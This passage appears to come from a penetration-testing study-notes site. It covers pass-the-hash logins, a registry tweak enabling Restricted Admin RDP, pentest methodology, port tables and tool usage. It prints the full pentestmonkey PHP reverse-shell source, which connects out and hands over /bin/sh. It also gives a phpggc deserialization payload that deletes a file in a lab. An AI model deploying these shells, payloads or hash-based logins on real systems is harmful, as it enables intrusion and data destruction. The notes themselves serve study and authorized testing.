                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-evil-winrm-linux","title":"Pass the Hash with evil-winrm (Linux)","text":"

                        See evil-winrm.

                        If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.

                        evil-winrm -i $ip -u <username> -H <hash>\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-rdp-linux","title":"Pass the Hash with RDP (Linux)","text":"
                        xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n

                        Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

                        reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

                        Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#uac-limits-pass-the-hash-for-local-accounts","title":"UAC Limits Pass the Hash for Local Accounts","text":"

                        UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

                        Note: There is one exception, if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PTH will fail against the machine when using that account. \u00b4

                        ","tags":["privilege escalation","windows"]},{"location":"pdm/","title":"pdm - A python package and dependency manager","text":""},{"location":"pdm/#installation","title":"Installation","text":"

                        PDM, as described, is a modern Python package and dependency manager supporting the latest PEP standards. But it is more than a package manager. It boosts your development workflow in various aspects. The most significant benefit is it installs and manages packages in a similar way to npm that doesn't need to create a virtualenv at all

                        curl -sSL https://raw.githubusercontent.com/pdm-project/pdm/main/install-pdm.py | python3 -\n
                        "},{"location":"penetration-testing-process/","title":"Penetration Testing Process: A General Approach to the Profession","text":"Sources for these notes
                        • Hack The Box: Penetration Testing Learning Path
                        • INE eWPT2 Preparation course

                        Resources:

                        • https://pentestreports.com/
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-penetration-testing","title":"Types of Penetration Testing","text":"Type Information Provided Blackbox Minimal. Only the essential information, such as IP addresses and domains, is provided. Greybox Extended. In this case, we are provided with additional information, such as specific URLs, hostnames, subnets, and similar. Whitebox Maximum. Here everything is disclosed to us. This gives us an internal view of the entire structure, which allows us to prepare an attack using internal information. We may be given detailed configurations, admin credentials, web application source code, etc. Red-Teaming May include physical testing and social engineering, among other things. Can be combined with any of the above types. Purple-Teaming It can be combined with any of the above types. However, it focuses on working closely with the defenders.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-testing-environments","title":"Types of Testing Environments","text":"

                        Apart from the test method and the type of test, another consideration is what is to be tested, which can be summarized in the following categories:

                        Network Web App Mobile API Thick Clients IoT Cloud Source Code Physical Security Employees Hosts Server Security Policies Firewalls IDS/IPS","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#phases","title":"Phases","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#pre-engagement","title":"Pre-engagement","text":"

                        The pre-engagement phase of a penetration testing is a crucial step that lays the foundation for a successful and well-planned security assessment. It involves preliminary preparations, understanding project requirements, and obtaining necessary authorizations before initiating the actual testing. During the pre-engagement phase, the penetration tester and the client must discuss and agree upon a number of legal and technical details pertinent to the execution and outcomes of the security assessment.

                        This can be one or more documents with the objective to define the following:

                        • Objectives:: Clearly define the objectives and goals of the penetration test. Understand what the stakeholders aim to achieve through the testing process.
                        • Scope of the engagement: Identify the scope of the penetration test, including the specific web applications, URLs, and functionalities to be tested. Define the scope boundaries and limitations, such as which systems or networks are out-of-scope for testing.
                        • Timeline & milestones
                        • Liabilities & responsibility: Obtain proper authorization from the organization's management or application owners to conduct the penetration test. Ensure that the testing activities comply with any legal or regulatory requirements, and that all relevant permissions are secured.
                        • Rules of Engagement (RoE): Establish a set of Rules of Engagement that outline the specific rules, constraints, and guidelines for the testing process. Include details about the testing schedule, testing hours, communication channels, and escalation procedures.
                        • Communication and Coordination: Establish clear communication channels with key stakeholders, including IT personnel, development teams, and management. Coordinate with relevant personnel to ensure minimal disruption to the production environment during testing.
                        • Expectations and deliverables
                        • Statement of work
                        • The Scoping Meeting: Conduct a scoping meeting with key stakeholders to discuss the testing objectives, scope, and any specific concerns or constraints. Use this meeting to clarify expectations and ensure everyone is aligned with the testing approach.
                        • List of documents so far:
                        Document Timing for Creation Non-Disclosure Agreement (NDA) After Initial Contact Scoping Questionnaire Before the Pre-Engagement Meeting Scoping Document During the Pre-Engagement Meeting Penetration Testing Proposal (Contract/Scope of Work (SoW)) During the Pre-engagement Meeting Rules of Engagement (RoE) Before the Kick-Off Meeting Contractors Agreement (Physical Assessments) Before the Kick-Off Meeting Reports During and after the conducted Penetration Test
                        • Risk Assessment and Acceptance: Perform a risk assessment to understand the potential impact of the penetration test on the web application and the organization. Obtain management's acceptance of any risks associated with the testing process.
                        • Engagement Kick-off: Officially kick-off the penetration test, confirming the start date and timeline with the organization's stakeholders. Share the RoE and any other relevant details with the testing team.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#information-gathering","title":"Information gathering","text":"

                        We could tell 4 categories:

                        • Open-Source Intelligence
                        • Infrastructure Enumeration
                        • Service Enumeration
                        • Host Enumeration

                        A different way to approach to footprinting is considering the following layers:

                        Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cloud-resources","title":"Cloud resources","text":"

                        Often cloud storage is added to the DNS list when used for administrative purposes by other employees.

                        for i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f1,4;done\n

                        More ways to find cloud storage:

                        google dork:

                        # Google search for AWS\nintext: example.com inurl:amazonaws.com\n\n# Google search for Azure\nintext: example.com inurl:blob.core.windows.net\n

                        Source code from the application: For instance

                        <link rel='dns-prefetch' href=\"//example.blob.core.windows.net\">\n

                        domain.glass service also provides cloud search services for a passive reconnaissance.

                        GrayHatWarfare is also noticeable. With this tool you can filter private and public keys leaked.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#vulnerability-assessment","title":"Vulnerability assessment","text":"

                        During the vulnerability assessment phase, we examine and analyze the information gathered during the information gathering phase. In Vulnerability Research, we look for known vulnerabilities, exploits, and security holes that have already been discovered and reported. After that, we should mirror the target system locally as precisely as possible to replicate our testing locally.

                        The purpose of a Vulnerability Assessment is to understand, identify, and categorize the risk for the more apparent issues present in an environment without actually exploiting them to gain further access.

                        Types of tests: black box, gray box and white box.

                        Specializations:

                        • Application pentesters.
                        • Network or infraestructure pentesters.
                        • Physical pentesters.
                        • Social engineering pentesters.

                        Types of Security assessments:

                        • Vulnerability assessment.
                        • Penetration test.
                        • Security audits.
                        • Bug bounties.
                        • Red team assessments.
                        • Purple team assessments.

                        Vulnerability Assessments and Penetration Tests are two completely different assessments. Vulnerability assessments look for vulnerabilities in networks without simulating cyber attacks. Penetration tests, depending on their type, evaluate the security of different assets and the impact of the issues present in the environment.

                        Source: HTB Academy and predatech.co.uk

                        Compliance standards

                        • Payment Card Industry Data Security Standard (PCI DSS).
                        • Health Insurance Portability and Accountability Act (HIPAA).
                        • Federal Information Security Management Act (FISMA).
                        • ISO 27001.
                        • The NIST (National Institute of Standards and Technology) is well known for their NIST Cybersecurity Framework.
                        • OWASP stands for the Open Web Application Security Project:
                          • Web Security Testing Guide (WSTG)
                          • Mobile Security Testing Guide (MSTG)
                          • Firmware Security Testing Methodology

                        Frameworks for Pentesting:

                        • Penetration Testing Execution Standard (PTES).
                        • Open Source Security Testing Methodology Manual (OSSTMM).
                        • Common Vulnerability Scoring System (CVSS).
                        • Common Vulneravilities and Exposures.

                        Scanners: OpenVAS, Nessus, Nexpose, and Qualys.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#exploitation","title":"Exploitation","text":"

                        Once we have set up the system locally and installed known components to mirror the target environment as closely as possible, we can start preparing the exploit by following the steps described in the exploit. Then we test this on a locally hosted VM to ensure it works and does not damage significantly.

                        • Transferring File Techniques: Linux.
                        • Transferring File Techniques: Windows
                        • Transferring files with code.
                        • File Encryption: windows and linux .
                        • LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins.
                        • Evading detection in file transfers.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-exploitation","title":"Post-exploitation","text":"

                        The Post-Exploitation stage aims to obtain sensitive and security-relevant information from a local perspective and business-relevant information that, in most cases, requires higher privileges than a standard user. This stage includes the following components:

                        • Evasive Testing: watch out with running commands such as net user or whoami that is often monitored by EDR systems and flagged as anomalous activity. Three methods: Evasive, Hybrid evasive, and Non-evasive.
                        • Information Gathering. The information gathering stage starts all over again from the local perspective. We also enumerate the local network and local services such as printers, database servers, virtualization services, etc.
                        • Pillaging. Pillaging is the stage where we examine the role of the host in the corporate network. We analyze the network configurations, including but not limited to: Interfaces, Routing, DNS, ARP, Services, VPN, IP Subnets, Shares, Network Traffic.
                        • Vulnerability Assessment: it is essential to distinguish between exploits that can harm the system and attacks against the services that do not cause any disruption.
                        • Privilege Escalation
                        • Persistence
                        • Data Exfiltration: During the Information Gathering and Pillaging stage, we will often be able to find, among other things, considerable personal information and customer data. Some clients will want to check whether it is possible to exfiltrate these types of data. This means we try to transfer this information from the target system to our own.
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#lateral-movement","title":"Lateral movement","text":"

                        In this stage, we want to test how far we can move manually in the entire network and what vulnerabilities we can find from the internal perspective that might be exploited. In doing so, we will again run through several phases:

                        1. Pivoting
                        2. Evasive Testing: There are many ways to protect against lateral movement, including network (micro) segmentation, threat monitoring, IPS/IDS, EDR, etc. To bypass these efficiently, we need to understand how they work and what they respond to. Then we can adapt and apply methods and strategies that help avoid detection.
                        3. Information Gathering
                        4. Vulnerability Assessment
                        5. (Privilege) Exploitation
                        6. Post-Exploitation
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#proof-of-concept","title":"Proof-Of-Concept","text":"

                        Proof of Concept (PoC) or Proof of Principle is a project management term. In project management, it serves as proof that a project is feasible in principle.

                        A PoC can have many different representations. For example, documentation of the vulnerabilities found can also constitute a PoC. The more practical version of a PoC is a script or code that automatically exploits the vulnerabilities found. This demonstrates the flawless exploitation of the vulnerabilities. This variant is straightforward for an administrator or developer because they can see what steps our script takes to exploit the vulnerability.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-engagement","title":"Post-Engagement","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cleanup","title":"Cleanup","text":"

                        Cleanup: Once testing is complete, we should perform any necessary cleanup, such as deleting tools/scripts uploaded to target systems, reverting any (minor) configuration changes we may have made, etc. We should have detailed notes of all of our activities, making any cleanup activities easy and efficient.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#reporting","title":"Reporting","text":"

                        Documentation and Reporting: Before completing the assessment and disconnecting from the client's internal network or sending \"stop\" notification emails to signal the end of testing, we must make sure to have adequate documentation for all findings that we plan to include in our report. This includes command output, screenshots, a listing of affected hosts, and anything else specific to the client environment or finding.

                        Typical parts of a report:

                        • Executive Summary: The report typically begins with an executive summary, which is a high-level overview of the key findings and the overall security posture of the web application. It highlights the most critical vulnerabilities, potential risks, and the impact they may have on the business. This section is designed for management and non-technical stakeholders to provide a quick understanding of the test results.
                        • Scope and Methodology: This section provides a clear description of the scope of the penetration test, including the target application, its components, and the specific testing activities performed. It also outlines the methodologies and techniques used during the assessment to ensure transparency and understanding of the testing process.
                        • Findings and Vulnerabilities: The core of the penetration test report is the detailed findings section. Each identified vulnerability is listed, along with a comprehensive description of the issue, the steps to reproduce it, and its potential impact on the application and organization. The vulnerabilities are categorized based on their severity level (e.g., critical, high, medium, low) to prioritize remediation efforts.
                        • Proof of Concept (PoC): For each identified vulnerability, the penetration tester includes a proof of concept (PoC) to demonstrate its exploitability. The PoC provides concrete evidence to support the validity of the findings and helps developers understand the exact steps required to reproduce the vulnerability.
                        • Risk Rating and Recommendations: In this section, the vulnerabilities are further analyzed to determine their risk rating and potential impact on the organization. The risk rating takes into account factors such as likelihood of exploitation, ease of exploit, potential data exposure, and business impact. Additionally, specific recommendations and best practices are provided to address and mitigate each vulnerability.
                        • Remediation Plan: The report should include a detailed remediation plan outlining the steps and actions required to fix the identified vulnerabilities. This plan helps guide the development and IT teams in prioritizing and addressing the security issues in a systematic manner.
                        • Additional Recommendations: In some cases, the report may include broader recommendations for improving the overall security posture of the web application beyond the identified vulnerabilities. These may include implementing security best practices, enhancing security controls, and conducting regular security awareness training.
                        • Appendices and Technical Details: Supporting technical details, such as HTTP requests and responses, server configurations, and logs, may be included in appendices to provide additional context and evidence for the identified vulnerabilities.

                        Resources:

                        • https://pentestreports.com/
                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#report-review-meeting","title":"Report Review Meeting","text":"

                        Report Review Meeting: Once the draft report is delivered, and the client has had a chance to distribute it internally and review it in-depth, it is customary to hold a report review meeting to walk through the assessment results.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#deliverable-acceptance","title":"Deliverable Acceptance","text":"

                        Deliverable Acceptance: Once the client has submitted feedback (i.e., management responses, requests for clarification/changes, additional evidence, etc.) either by email or (ideally) during a report review meeting, we can issue them a new version of the report marked FINAL

                        Post-Remediation Testing: Most engagements include post-remediation testing as part of the project's total cost. In this phase, we will review any documentation provided by the client showing evidence of remediation or just a list of remediated findings.

                        Since a penetration test is essentially an audit, we must remain impartial third parties and not perform remediation on our findings (such as fixing code, patching systems, or making configuration changes in Active Directory). After a penetration test concludes, we will have a considerable amount of client-specific data such as scan results, log output, credentials, screenshots, and more. We should retain evidence for some time after the penetration test in case questions arise about specific findings or to assist with retesting \"closed\" findings after the client has performed remediation activities. Any data retained after the assessment should be stored in a secure location owned and controlled by the firm and encrypted at rest.

                        ","tags":["pentesting","CPTS","eWPT"]},{"location":"pentesmonkey/","title":"Pentesmonkey php reverse shell","text":"Resources to generate reverse shells
                        • https://www.revshells.com/
                        • Netcat for windows 32/64 bit
                        • Pentesmonkey
                        • PayloadsAllTheThings

                        Additionally, have a look at \"notes on reverse shells\"

                        Download Pentesmonkey from github: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.

                        <?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  The author accepts no liability\n// for damage caused by this tool.  If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '127.0.0.1';  // CHANGE THIS\n$port = 1234;       // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies.  Worth a try...\nif (function_exists('pcntl_fork')) {\n    // Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n        printit(\"ERROR: Can't fork\");\n        exit(1);\n    }\n\n    if ($pid) {\n        exit(0);  // Parent exits\n    }\n\n    // Make the current process a session leader\n    // Will only succeed if we forked\n    if (posix_setsid() == -1) {\n        printit(\"Error: Can't setsid()\");\n        exit(1);\n    }\n\n    $daemon = 1;\n} else {\n    printit(\"WARNING: Failed to daemonise.  This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n    printit(\"$errstr ($errno)\");\n    exit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n   0 => array(\"pipe\", \"r\"),  // stdin is a pipe that the child will read from\n   1 => array(\"pipe\", \"w\"),  // stdout is a pipe that the child will write to\n   2 => array(\"pipe\", \"w\")   // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n    printit(\"ERROR: Can't spawn shell\");\n    exit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n    // Check for end of TCP connection\n    if (feof($sock)) {\n        printit(\"ERROR: Shell connection terminated\");\n        break;\n    }\n\n    // Check for end of STDOUT\n    if (feof($pipes[1])) {\n        printit(\"ERROR: Shell process terminated\");\n        break;\n    }\n\n    // Wait until a command is end down $sock, or some\n    // command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    // If we can read from the TCP socket, send\n    // data to process's STDIN\n    if (in_array($sock, $read_a)) {\n        if ($debug) printit(\"SOCK READ\");\n        $input = fread($sock, $chunk_size);\n        if ($debug) printit(\"SOCK: $input\");\n        fwrite($pipes[0], $input);\n    }\n\n    // If we can read from the process's STDOUT\n    // send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n        if ($debug) printit(\"STDOUT READ\");\n        $input = fread($pipes[1], $chunk_size);\n        if ($debug) printit(\"STDOUT: $input\");\n        fwrite($sock, $input);\n    }\n\n    // If we can read from the process's STDERR\n    // send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n        if ($debug) printit(\"STDERR READ\");\n        $input = fread($pipes[2], $chunk_size);\n        if ($debug) printit(\"STDERR: $input\");\n        fwrite($sock, $input);\n    }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n    if (!$daemon) {\n        print \"$string\\n\";\n    }\n}\n\n?> \n
                        ","tags":["reverse shell","php"]},{"location":"pentesting-network-services/","title":"Pentesting network services","text":"

                        Port numbers range from 1 to 65,535, with the range of well-known ports 1 to 1,023 being reserved for privileged services. Port 0 is a reserved port in TCP/IP networking and is not used in TCP or UDP messages. If anything attempts to bind to port 0 (such as a service), it will bind to the next available port above port 1,024 because port 0 is treated as a \"wild card\" port.

                        See Pentesting network services.

                        To locate easily one: https://www.cheatsheet.wtf/PortNumbers/

                        All ports in raw: https://raw.githubusercontent.com/maraisr/ports-list/master/all.csv.

                        ","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#tcp","title":"TCP","text":"Protocol Acronym Port Description Tools File Transfer Protocol FTP 20-21 Used to transfer files ftp, lftp , ncftp, filezilla, crossftp Secure Shell SSH 22 Secure remote login service Telnet Telnet 23 Remote login service Simple Network Management Protocol SNMP 161-162 Manage network devices Hyper Text Transfer Protocol HTTP 80 Used to transfer webpages Hyper Text Transfer Protocol Secure HTTPS 443 Used to transfer secure webpages Domain Name System DNS 53 Lookup domain names Trivial File Transfer Protocol TFTP 69 Used to transfer files Network Time Protocol NTP 123 Synchronize computer clocks Simple Mail Transfer Protocol SMTP 25 Used for email transfer Thunderbird, Claws, Geary, MailSpring, mutt, mailutils, sendEmail, swaks, sendmail. Post Office Protocol POP3 110 Used to retrieve emails Internet Message Access Protocol IMAP 143 Used to access emails Server Message Block SMB 445 Used to transfer files Samba Suite, smbclient, crackmapexec, SMBMap, smbexec.py, psexec.py, Impacket Network File System NFS 111, 2049 Used to mount remote systems Bootstrap Protocol BOOTP 67, 68 Used to bootstrap computers Kerberos Kerberos 88 Used for authentication and authorization Lightweight Directory Access Protocol LDAP 389 Used for directory services Remote Authentication Dial-In User Service RADIUS 1812, 1813 Used for authentication and authorization Dynamic Host Configuration Protocol DHCP 67, 68 Used to configure IP addresses Remote Desktop Protocol RDP 3389 Used for remote desktop access Network News Transfer Protocol NNTP 119 Used to access newsgroups Remote Procedure Call RPC 135, 137-139 Used to call remote procedures Identification Protocol Ident 113 Used to identify user processes Internet Control Message Protocol ICMP 0-255 Used to troubleshoot network issues Internet Group Management Protocol IGMP 0-255 Used for multicasting Oracle DB (Default/Alternative) Listener oracle-tns 1521/1526 The Oracle database default/alternative listener is a service that runs on the database host and receives requests from Oracle clients. Ingres Lock ingreslock 1524 Ingres database is commonly used for large commercial applications and as a backdoor that can execute commands remotely via RPC. Squid Web Proxy http-proxy 3128 Squid web proxy is a caching and forwarding HTTP web proxy used to speed up a web server by caching repeated requests. Secure Copy Protocol SCP 22 Securely copy files between systems Session Initiation Protocol SIP 5060 Used for VoIP sessions Simple Object Access Protocol SOAP 80, 443 Used for web services Secure Socket Layer SSL 443 Securely transfer files TCP Wrappers TCPW 113 Used for access control Network Time Protocol NTP 123 Synchronize computer clocks Internet Security Association and Key Management Protocol ISAKMP 500 Used for VPN connections Microsoft SQL Server ms-sql-s 1433 Used for client connections to the Microsoft SQL Server. mssql-cli, mssqlclient.py, dbeaver Kerberized Internet Negotiation of Keys KINK 892 Used for authentication and authorization Open Shortest Path First OSPF 520 Used for routing Point-to-Point Tunneling Protocol PPTP 1723 Is used to create VPNs Remote Execution REXEC 512 This protocol is used to execute commands on remote computers and send the output of commands back to the local computer. Remote Login RLOGIN 513 This protocol starts an interactive shell session on a remote computer. X Window System X11 6000 It is a computer software system and network protocol that provides a graphical user interface (GUI) for networked computers. Relational Database Management System DB2 50000 RDBMS is designed to store, retrieve and manage data in a structured format for enterprise applications such as financial systems, customer relationship management (CRM) systems.","tags":["ports","services","network services"]},{"location":"pentesting-network-services/#udp","title":"UDP","text":"Protocol Acronym Port Description Domain Name System DNS 53 It is a protocol to resolve domain names to IP addresses. Trivial File Transfer Protocol TFTP 69 It is used to transfer files between systems. Network Time Protocol NTP 123 It synchronizes computer clocks in a network. Simple Network Management Protocol SNMP 161 It monitors and manages network devices remotely. Routing Information Protocol RIP 520 It is used to exchange routing information between routers. Internet Key Exchange IKE 500 Internet Key Exchange Bootstrap Protocol BOOTP 68 It is used to bootstrap hosts in a network. Dynamic Host Configuration Protocol DHCP 67 It is used to assign IP addresses to devices in a network dynamically. Telnet TELNET 23 It is a text-based remote access communication protocol. MySQL MySQL 3306 It is an open-source database management system. Terminal Server TS 3389 It is a remote access protocol used for Microsoft Windows Terminal Services by default. NetBIOS Name netbios-ns 137 It is used in Windows operating systems to resolve NetBIOS names to IP addresses on a LAN. Microsoft SQL Server ms-sql-m 1434 Used for the Microsoft SQL Server Browser service. Universal Plug and Play UPnP 1900 It is a protocol for devices to discover each other on the network and communicate. PostgreSQL PGSQL 5432 It is an object-relational database management system. Virtual Network Computing VNC 5900 It is a graphical desktop sharing system. X Window System X11 6000-6063 It is a computer software system and network protocol that provides GUI on Unix-like systems. Syslog SYSLOG 514 It is a standard protocol to collect and store log messages on a computer system. Internet Relay Chat IRC 194 It is a real-time Internet text messaging (chat) or synchronous communication protocol. OpenPGP OpenPGP 11371 It is a protocol for encrypting and signing data and communications. Internet Protocol Security IPsec 500 IPsec is also a protocol that provides secure, encrypted communication. It is commonly used in VPNs to create a secure tunnel between two devices. Internet Key Exchange IKE 11371 It is a protocol for encrypting and signing data and communications. X Display Manager Control Protocol XDMCP 177 XDMCP is a network protocol that allows a user to remotely log in to a computer running the X11.","tags":["ports","services","network services"]},{"location":"pesecurity/","title":"PESecurity - A powershell script to check windows binaries compilations","text":"

                        PESecurity is a powershell script that checks if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.

                        "},{"location":"pesecurity/#installation","title":"Installation","text":"

                        Download from: https://github.com/NetSPI/PESecurity.

                        "},{"location":"pesecurity/#usage","title":"Usage","text":"
                        # To execute Get-PESecurity, first import the module\nImport-Module .\\Get-PESecurity.psm1\n\n# Check a single file\nGet-PESecurity -file C:\\Windows\\System32\\kernel32.dll\n\n# Check a directory for DLLs & EXEs\nGet-PESecurity -directory C:\\Windows\\System32\\\n\n# Check a directory for DLLs & EXEs recrusively\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive\n\n# Export results as a CSV\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Export-CSV file.csv\n\n# Show results in a table\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table\n\n# Show results in a table and sort by a column\nGet-PESecurity -directory C:\\Windows\\System32\\ -recursive | Format-Table | sort ASLR\n
                        "},{"location":"phpggc/","title":"Phpggc - A tool for PHP deserialization","text":"

                        PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

                        It can be seen as the equivalent of frohoff's ysoserial, but for PHP.

                        Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

                        ","tags":["webpentesting","tools","deserialization","php"]},{"location":"phpggc/#installation","title":"Installation","text":"

                        Repository: https://github.com/ambionics/phpggc

                        Clone it:

                        git clone https://github.com/ambionics/phpggc.git\n

                        List available gadget chains:

                        cd phpggc\n\n./phpggc -l\n

                        Example from Burpsuite lab:

                        /phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n
                        ","tags":["webpentesting","tools","deserialization","php"]},{"location":"ping/","title":"Ping","text":"

                        ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive.

                        ping www.example.com\nping 8.8.8.8\n

                        Ping sweeping tools automatically perform the same operation to every host in a subnet or IP range.

                        ","tags":["scanning","reconnaissance"]},{"location":"postfix/","title":"postfix - A SMTP server","text":"","tags":["linux","tool","SMTP","SMTP server"]},{"location":"postfix/#local-installation","title":"Local installation","text":"
                        sudo apt update\n\nsudo apt install mailutils\n# At the end of the installation a pop up will prompt you about the general type of mail configuration. Pick \"Internet site\". If not prompted, run this to execute it:\nsudo dpkg-reconfigure postfix\n# System mail name must coincide with the  server's name you provided before.\n

                        To edit the configuration of the service:

                        sudo nano /etc/postfix/main.cf\n

                        More on https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-postfix-as-a-send-only-smtp-server-on-ubuntu-18-04-es.

                        ","tags":["linux","tool","SMTP","SMTP server"]},{"location":"powerapps-pentesting/","title":"Pentesting PowerApps","text":"

                        Sources from these notes

                        Power Apps - Complete Guide to Microsoft PowerApps

                        Powerapp falls into the category of a No-code/Low-code solution. PowerApps is the Microsoft solution for developing applications (app is built in a powerapp environment that takes care of everything needed for your code to be run everywhere).

                        PowerApp enables your application to connect to anything and have a great deal of customizing features.

                        Power Apps developed in the Power Platform environment and published for use by internal and external users are often critical to the organization.

                        They enable key business processes, leverage and interface with highly sensitive business data and integrate with multiple data source and applications, consequently becoming the gateway from the cloud to the most sensitive business applications of the organization.

